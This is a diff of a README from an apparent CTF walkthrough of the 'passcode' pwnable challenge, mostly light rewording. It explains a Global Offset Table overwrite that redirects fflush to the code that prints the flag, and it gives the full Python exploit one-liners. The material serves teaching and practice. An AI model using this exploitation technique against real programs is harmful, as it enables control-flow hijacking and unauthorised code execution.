itaybel/PwnableWalkthrough/README.md

 End of assembler dump.
 ```
 We found the address 0x804a004, which is an address in the Global Offset Table, which calls the libc fflush function.
-If we can set the value of `passcode1` to `0x804a004`, we can write change the address in the Global Offset Table, so that we can run our own code!
+If we can set the value of `passcode1` to `0x804a004`, we can  change the address in the Global Offset Table, to run our own code!
-In order to change the value of `passcode1` , we would need to do:
+In order to change the value of `passcode1` , we need to do:
 `(python -c "print('A' * 96 + '\x04\xa0\x04\x08')") | ./passcode`

-After that, we will reach the scanf of `passcode1`, which will write an input from the user into 0x804a004.
+Then, we will reach the scanf of `passcode1`, which will write an input from the user into 0x804a004.
 So now we can control where the program will jump to!
-So in order to get the flag, the best thing to do is to jump to the end where the `system("/bin/cat flag");` starts.
+In order to get the flag, the best thing to do is to jump to the end , where the `system("/bin/cat flag");` starts.
 it starts right in this line:
 `0x080485e3 <+127>:   mov    DWORD PTR [esp],0x80487af`
-but because scanf takes input in decimal, we would need to change 0x080485e3 to decimal, which is 134514147.
+but because scanf takes input in decimal, we need to change 0x080485e3 to decimal, which is 134514147.
 So the final solution will be:
 `(python -c "print('A' * 96 + '\x04\xa0\x04\x08' + '134514147')") | ./passcode`